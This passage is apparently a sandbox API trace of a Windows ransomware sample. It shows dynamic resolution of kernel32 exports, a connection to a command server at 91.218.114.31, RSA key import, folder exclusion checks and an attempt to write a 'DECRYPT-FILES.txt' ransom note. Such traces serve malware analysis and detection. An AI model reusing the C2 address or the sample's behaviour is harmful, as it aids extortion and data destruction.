returned="CreateFileTransactedW" [0179.394] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.394] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.394] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.394] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.394] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.394] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.394] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.394] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.394] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.394] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.394] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.394] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.394] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.394] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.395] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.395] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.395] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.395] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.395] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.395] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.395] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.395] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.395] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.395] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.395] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.395] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.395] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.395] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.395] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.395] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.395] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.395] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.395] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.395] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.396] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.396] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.396] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.396] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.396] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.396] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.396] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.396] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.396] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.396] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.396] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.396] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.396] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.396] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.396] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.396] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.396] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.396] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.396] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.396] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.397] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.397] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.397] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.397] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.397] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.397] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.397] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.397] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.397] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.397] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.397] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.397] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.397] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.397] lstrlenA (lpString="DELETEATOM") returned 10 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.397] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.397] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.397] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.397] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.397] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.397] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.398] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.398] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.398] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.398] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.398] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.398] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.398] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.398] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.398] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.398] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.398] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.398] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.398] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.398] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.398] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.398] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.399] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.399] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.399] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.399] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.399] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.399] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.399] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.399] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.399] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.399] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.399] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.399] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.399] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.399] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.399] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.399] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.399] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.400] wsprintfA (in: param_1=0x5c0000, param_2="http://%s%s" | out: param_1="http://91.218.114.31/create/aurtrof.phtml?xvg=0") returned 47 [0179.400] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0179.400] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x620000 [0179.400] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.400] VirtualAlloc (lpAddress=0x0, dwSize=0x29, flAllocationType=0x3000, flProtect=0x4) returned 0x730000 [0179.401] inet_pton (in: Family=2, pszAddrString="91.218.114.31", pAddrBuf=0x31cf30c | out: pAddrBuf=0x31cf30c) returned 1 [0179.401] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf758 | out: lpWSAData=0x31cf758) returned 0 [0179.404] socket (af=2, type=1, protocol=6) returned 0x240 [0179.407] inet_addr (cp="91.218.114.31") returned 0x1f72da5b [0179.407] htons (hostshort=0x50) returned 0x5000 [0179.407] connect (s=0x240, name=0x31cf2e8*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.31"), namelen=16) Thread: id = 350 os_tid = 0x5d8 [0179.173] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x630000 [0179.173] CryptAcquireContextW (in: phProv=0x630004, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x630004*=0x49bb80) returned 1 [0179.176] CryptImportKey (in: hProv=0x49bb80, pbData=0x740000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x630008 | out: phKey=0x630008*=0x479638) returned 1 [0179.180] StrStrW (lpFirst="C:\\", lpSrch="\\Program Files") returned 0x0 [0179.180] StrStrW (lpFirst="C:\\", lpSrch=":\\Windows") returned 0x0 [0179.180] StrStrW (lpFirst="C:\\", lpSrch="\\Games\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\All Users") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="AhnLab") returned 0x0 [0179.183] StrStrW (lpFirst="C:\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.183] lstrlenW (lpString="C:\\") returned 3 [0179.183] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.184] wsprintfW (in: param_1=0x36ff45c, param_2="%s\\%s" | out: param_1="C:\\\\0a16c9.tmp") returned 14 [0179.184] CreateFileW (lpFileName="C:\\\\0a16c9.tmp" (normalized: "c:\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.184] GetLastError () returned 0x5 [0179.184] lstrlenW (lpString="C:\\") returned 3 [0179.184] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.185] wsprintfW (in: param_1=0x36ff45c, param_2="%s\\%s" | out: param_1="C:\\\\DECRYPT-FILES.txt") returned 21 [0179.185] CreateFileW (lpFileName="C:\\\\DECRYPT-FILES.txt" (normalized: "c:\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.185] lstrlenW (lpString="C:\\") returned 3 [0179.185] lstrcatW (in: lpString1="C:\\", lpString2="*" | out: lpString1="C:\\*") returned="C:\\*" [0179.185] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x4796f8 [0179.185] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0179.185] lstrcmpW 